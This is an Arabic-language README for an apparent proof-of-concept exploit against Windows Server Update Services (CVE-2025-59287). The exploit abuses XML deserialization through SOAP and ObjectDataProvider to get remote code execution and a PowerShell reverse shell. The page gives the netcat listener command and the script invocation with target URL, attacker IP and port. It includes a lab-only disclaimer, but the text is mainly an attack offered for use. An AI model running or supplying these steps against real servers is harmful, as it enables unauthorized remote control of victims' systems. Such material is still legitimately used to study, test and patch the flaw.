
إثبات مفهوم (PoC) لاستغلال ثغرة WSUS CVE-2025-59287 باستخدام إلغاء تسلسل XML لتحقيق قشرة عكسية على ويندوز عبر SOAP وObjectDataProvider.
WSUS CVE-2025-59287 – إلغاء تسلسل XML (RCE) (صدفة عكسية) PoC مركّز لاستغلال ثغرة WSUS CVE-2025-59287 عبر إلغاء تسلسل XML لتحقيق صدفة عكسية لنظام Windows. يدعم هذا السكربت حمولة الصدفة العكسية فقط (بدون خيار احتياطي للحاسبة). الهدف: خادم Windows مع دور WSUS التقنية: SOAP + إلغاء تسلسل ObjectDataProvider النتيجة: cmd.exe يشغّل صدفة PowerShell عكسية إلى المستمع الخاص بك إخلاء مسؤولية للاستخدام المصرح به في بيئات المختبر فقط. أنت مسؤول عن الامتثال لجميع القوانين المعمول بها. المتطلبات Python 3.x وصول شبكي إلى نقاط نهاية WSUS (عادةً 8530/8531) مستمع على جهازك (مثل nc)
nc -lvnp 4444
python3 my-CVE-2025-59287.py -u http://TARGET:8531 -l YOUR_IP -p 4444 --debug
-u: عنوان WSUS الأساسي (http/https، عادةً المنفذ 8530/8531) -l: عنوان IP الخاص بك لاستقبال الصدفة -p: منفذ المستمع الخاص بك --debug: إخراج مفصّل